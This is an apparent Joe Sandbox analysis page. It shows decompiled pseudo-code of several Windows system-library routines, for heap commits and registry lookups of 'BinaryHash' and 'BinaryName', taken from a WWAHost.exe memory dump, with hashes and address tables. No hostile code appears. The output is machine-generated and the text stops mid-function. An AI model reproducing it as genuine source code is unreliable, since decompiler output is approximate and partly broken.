                                              0x039afa41
                                              0x039afa3c
                                              0x039afa4a
                                              0x039afa4f
                                              0x039afa51
                                              0x039afa53
                                              0x039afa56
                                              0x039afa5b
                                              0x039afa5e
                                              0x00000000
                                              0x039afa5e
                                              0x03952e23

                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: RTL: Re-Waiting
                                              • API String ID: 0-316354757
                                              • Opcode ID: a6ec4fc459f88b5a2edf1458b2cd704f757e2154eecb952e6617a677234462c8
                                              • Instruction ID: 12f4eb7035cf38baab48efa9a49b19a6afd5f2ba020977b437dab59cfe73da70
                                              • Opcode Fuzzy Hash: a6ec4fc459f88b5a2edf1458b2cd704f757e2154eecb952e6617a677234462c8
                                              • Instruction Fuzzy Hash: 2E612A31A00B449FEB31DF6CC884B7EB7A9EB85754F180AA9E8529B2C0D7349D85C7D1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 03A20EA5 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 80%
                                              			E03A20EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E03A1FF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E03A21074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E03999730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E03A1A80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E03A1A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x3a48b04 >> 0x14) + (_v44 -  *0x3a48b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E03977D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E03A1138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E03977D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E03A0FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x3a48724 & 0x00000008) != 0) {
						E03A152F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E03A215B5(0x3a48ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}
























                                              0x03a20eb7
                                              0x03a20eb9
                                              0x03a20ec0
                                              0x03a20ec2
                                              0x03a20ecd
                                              0x03a2105b
                                              0x03a2105b
                                              0x03a21061
                                              0x03a21066
                                              0x03a21066
                                              0x03a2106b
                                              0x03a21073
                                              0x03a21073
                                              0x03a20ed3
                                              0x03a20ed6
                                              0x03a20edc
                                              0x03a20ee0
                                              0x03a20ee7
                                              0x03a20ef0
                                              0x03a20ef5
                                              0x03a20efa
                                              0x03a20efc
                                              0x03a20efd
                                              0x03a20f03
                                              0x03a20f04
                                              0x03a20f06
                                              0x03a20f07
                                              0x03a20f09
                                              0x03a20f0e
                                              0x03a20f14
                                              0x03a20f23
                                              0x03a20f2d
                                              0x03a20f34
                                              0x03a20f34
                                              0x03a20f14
                                              0x03a20f52
                                              0x00000000
                                              0x00000000
                                              0x03a20f58
                                              0x03a20f73
                                              0x03a20f74
                                              0x03a20f79
                                              0x03a20f7d
                                              0x03a20f80
                                              0x03a20f86
                                              0x03a20fab
                                              0x03a20fb5
                                              0x03a20fc6
                                              0x03a20fd1
                                              0x03a20fe3
                                              0x03a20fd3
                                              0x03a20fdc
                                              0x03a20fdc
                                              0x03a20feb
                                              0x03a21009
                                              0x03a21009
                                              0x03a21015
                                              0x03a21027
                                              0x03a21017
                                              0x03a21020
                                              0x03a21020
                                              0x03a2102f
                                              0x03a2103c
                                              0x03a2103c
                                              0x03a21048
                                              0x03a21050
                                              0x03a21050
                                              0x03a21055
                                              0x00000000
                                              0x03a21055
                                              0x03a20f88
                                              0x03a20f9e
                                              0x03a20fa2
                                              0x03a20fa9
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x03a20fa9
                                              0x00000000

                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: `
                                              • API String ID: 0-2679148245
                                              • Opcode ID: 61db3da4e38063b9939675d5c856a02851d5a835cb3764efcd0d79990d52fb71
                                              • Instruction ID: d4cb4536b86e6351f2b9b4cadd23fd0dc868ebc909793e79e5c6653b3923c628
                                              • Opcode Fuzzy Hash: 61db3da4e38063b9939675d5c856a02851d5a835cb3764efcd0d79990d52fb71
                                              • Instruction Fuzzy Hash: 3851B1752083919FD324DF2DD980B1BBBE5EBC4704F04092EF9969B290D775E806C762
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0398F0BF Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 75%
                                              			E0398F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E03974120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E03999830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E03999990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E039995D0();
							goto L11;
						} else {
							_t109 = L03974620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E0399F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E039995D0();
										L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

























                                              0x0398f0d3
                                              0x0398f0d9
                                              0x0398f0e0
                                              0x0398f0e7
                                              0x0398f0f2
                                              0x0398f0f4
                                              0x0398f0f8
                                              0x0398f100
                                              0x0398f108
                                              0x0398f10d
                                              0x0398f115
                                              0x0398f116
                                              0x0398f11f
                                              0x0398f123
                                              0x0398f124
                                              0x0398f12c
                                              0x0398f130
                                              0x0398f134
                                              0x0398f13d
                                              0x0398f144
                                              0x0398f14b
                                              0x0398f152
                                              0x039cbab0
                                              0x039cbab0
                                              0x0398f158
                                              0x0398f158
                                              0x0398f15a
                                              0x0398f160
                                              0x0398f165
                                              0x0398f166
                                              0x0398f16f
                                              0x0398f173
                                              0x039cbaa7
                                              0x039cbaa7
                                              0x039cbaab
                                              0x00000000
                                              0x0398f179
                                              0x0398f18d
                                              0x0398f191
                                              0x039cbaa2
                                              0x00000000
                                              0x0398f197
                                              0x0398f19b
                                              0x0398f1a2
                                              0x0398f1a9
                                              0x0398f1af
                                              0x0398f1b2
                                              0x0398f1b6
                                              0x0398f1b9
                                              0x0398f1c4
                                              0x0398f1d8
                                              0x0398f1df
                                              0x0398f1e3
                                              0x0398f1eb
                                              0x0398f1ee
                                              0x0398f1f4
                                              0x0398f20f
                                              0x039cbab7
                                              0x039cbabb
                                              0x039cbacc
                                              0x039cbad1
                                              0x0398f215
                                              0x0398f218
                                              0x0398f226
                                              0x0398f22b
                                              0x00000000
                                              0x0398f22b
                                              0x0398f1f6
                                              0x0398f1f6
                                              0x0398f1f9
                                              0x0398f1fb
                                              0x0398f1fb
                                              0x0398f1f4
                                              0x0398f191
                                              0x0398f173
                                              0x0398f152
                                              0x0398f203

                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @
                                              • API String ID: 0-2766056989
                                              • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                              • Instruction ID: d8e15724655c172d1050f86f82b1ebd1b7fdeb1dccace69ce7f609808758718f
                                              • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                              • Instruction Fuzzy Hash: A9517F755047109FD320DF59C841A6BBBF8FF88750F00892EF9969B690E774E914CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 039D3540 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 75%
                                              			E039D3540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x3a4d360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E03990BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E039D3706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E0399FA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E039D3540;
						E0399FA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E039ADDD0( &_v1072, _t75, _t79, _t80, _t81);
						E039E0C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E039997C0();
					}
					return E0399B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E039D3971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E039D3884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E0399FA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E03999650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E039D3787(_a4,  &_v352, _t80);
						}
					}
					L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E039995D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}































                                              0x039d3552
                                              0x039d355a
                                              0x039d355d
                                              0x039d3566
                                              0x039d3567
                                              0x039d357e
                                              0x039d358f
                                              0x039d35a1
                                              0x039d35a5
                                              0x039d366b
                                              0x039d366b
                                              0x039d366d
                                              0x039d3672
                                              0x039d3679
                                              0x039d3685
                                              0x039d368d
                                              0x039d369d
                                              0x039d36a7
                                              0x039d36b8
                                              0x039d36c6
                                              0x039d36c7
                                              0x039d36dc
                                              0x039d36e1
                                              0x039d36e7
                                              0x039d36e9
                                              0x039d36e9
                                              0x039d3703
                                              0x039d3703
                                              0x039d35b5
                                              0x039d35c0
                                              0x039d35c4
                                              0x00000000
                                              0x00000000
                                              0x039d35ca
                                              0x039d35d7
                                              0x039d35e2
                                              0x039d35e6
                                              0x039d35e8
                                              0x039d35f5
                                              0x039d35fa
                                              0x039d3603
                                              0x039d3604
                                              0x039d3609
                                              0x039d360a
                                              0x039d3612
                                              0x039d3613
                                              0x039d361e
                                              0x039d3622
                                              0x039d3628
                                              0x039d362f
                                              0x039d362f
                                              0x039d3636
                                              0x039d3638
                                              0x039d363b
                                              0x039d3642
                                              0x039d3642
                                              0x039d3636
                                              0x039d3657
                                              0x039d3657
                                              0x039d365c
                                              0x039d3662
                                              0x039d3669
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000

                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID: BinaryHash
                                              • API String ID: 2994545307-2202222882
                                              • Opcode ID: 53aa2a772beae86f4317f87d9852f7876f246b09dfd49f69c0156ad8d42923b8
                                              • Instruction ID: c998ae00f7f024d4af8414dc38fea1b3da28b78fa209359883c2781746f5d863
                                              • Opcode Fuzzy Hash: 53aa2a772beae86f4317f87d9852f7876f246b09dfd49f69c0156ad8d42923b8
                                              • Instruction Fuzzy Hash: 4F4154B6D0162C9BDF21DA54CC81FEEB77CAB44715F0085E5EA09AB240DB309E88CF95
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 03A205AC Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 71%
                                              			E03A205AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E03A207DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E03999730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E03A1A80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E03A1A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E03A21293(_t79, _v40, E03A207DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E03977D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E03A1138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

















                                              0x03a205c5
                                              0x03a205ca
                                              0x03a205d3
                                              0x03a206db
                                              0x03a206db
                                              0x03a206dd
                                              0x03a206e3
                                              0x03a206e3
                                              0x03a205dd
                                              0x03a205e7
                                              0x03a205f6
                                              0x03a20600
                                              0x03a20607
                                              0x03a20610
                                              0x03a20615
                                              0x03a2061a
                                              0x03a2061c
                                              0x03a2061e
                                              0x03a20624
                                              0x03a20625
                                              0x03a20627
                                              0x03a20628
                                              0x03a20631
                                              0x03a20640
                                              0x03a2064d
                                              0x03a20654
                                              0x03a20654
                                              0x03a20631
                                              0x03a2066d
                                              0x03a20674
                                              0x00000000
                                              0x00000000
                                              0x03a20692
                                              0x03a2069e
                                              0x03a206b0
                                              0x03a206a0
                                              0x03a206a9
                                              0x03a206a9
                                              0x03a206b8
                                              0x03a206d6
                                              0x03a206d6
                                              0x00000000

                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: `
                                              • API String ID: 0-2679148245
                                              • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                              • Instruction ID: 47d3614a22e0ee174fe5824aeededb969b660ca635abb00c40987e90251c7767
                                              • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                              • Instruction Fuzzy Hash: 5431E2322007156BE720DF28CD45F9BBBE9ABC4754F08422AF9549B280E7B4E914C791
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 039D3884 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 72%
                                              			E039D3884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E03999650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L03974620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E03999650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}















                                              0x039d3893
                                              0x039d3896
                                              0x039d3899
                                              0x039d389f
                                              0x039d38a0
                                              0x039d38a4
                                              0x039d38a9
                                              0x039d38ac
                                              0x039d38ad
                                              0x039d38ae
                                              0x039d38af
                                              0x039d38b1
                                              0x039d38b4
                                              0x039d38bb
                                              0x039d38bc
                                              0x039d38bd
                                              0x039d38c4
                                              0x039d38c8
                                              0x039d38ca
                                              0x039d38ca
                                              0x039d38d5
                                              0x039d393e
                                              0x039d3940
                                              0x039d3942
                                              0x039d3952
                                              0x039d3954
                                              0x039d3961
                                              0x039d3961
                                              0x039d3967
                                              0x039d396e
                                              0x039d396e
                                              0x039d3947
                                              0x039d394c
                                              0x00000000
                                              0x039d394c
                                              0x039d38ea
                                              0x039d38ee
                                              0x039d38f8
                                              0x039d38f9
                                              0x039d38ff
                                              0x039d3900
                                              0x039d3902
                                              0x039d3903
                                              0x039d390b
                                              0x039d390f
                                              0x039d3950
                                              0x00000000
                                              0x039d3950
                                              0x039d3915
                                              0x039d391d
                                              0x039d391d
                                              0x039d3922
                                              0x039d3926
                                              0x00000000
                                              0x039d3928
                                              0x039d392b
                                              0x039d392b
                                              0x039d3935
                                              0x039d3937
                                              0x039d3937
                                              0x00000000
                                              0x039d3935
                                              0x039d3926
                                              0x039d38f0
                                              0x00000000

                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID: BinaryName
                                              • API String ID: 2994545307-215506332
                                              • Opcode ID: 6521e2f5a1099bd7a092bec83256e55b7665e837a616e6a1d36b0c1f9810c6c5
                                              • Instruction ID: a46c8b4bd02cb73ec6604707a21459e9ee110b7ca96e7d032a728899d5a039c2
                                              • Opcode Fuzzy Hash: 6521e2f5a1099bd7a092bec83256e55b7665e837a616e6a1d36b0c1f9810c6c5
                                              • Instruction Fuzzy Hash: B231053AD00609EFDB15DB58C986E7FF778EB80760F058169E806AB280D7309E00C7A2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0398D294 Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 33%
                                              			E0398D294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x3a4d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E03974120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E0399B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E039998D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E039995D0();
					L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

































                                              0x0398d29c
                                              0x0398d2a6
                                              0x0398d2b1
                                              0x0398d2b5
                                              0x0398d2b6
                                              0x0398d2bc
                                              0x0398d2bd
                                              0x0398d2be
                                              0x0398d2bf
                                              0x0398d2c2
                                              0x0398d2c4
                                              0x0398d2cc
                                              0x0398d384
                                              0x0398d34b
                                              0x0398d34f
                                              0x0398d350
                                              0x0398d351
                                              0x0398d35c
                                              0x0398d35c
                                              0x0398d2d6
                                              0x0398d2da
                                              0x0398d2e1
                                              0x0398d361
                                              0x0398d369
                                              0x0398d36d
                                              0x0398d2e3
                                              0x0398d2e3
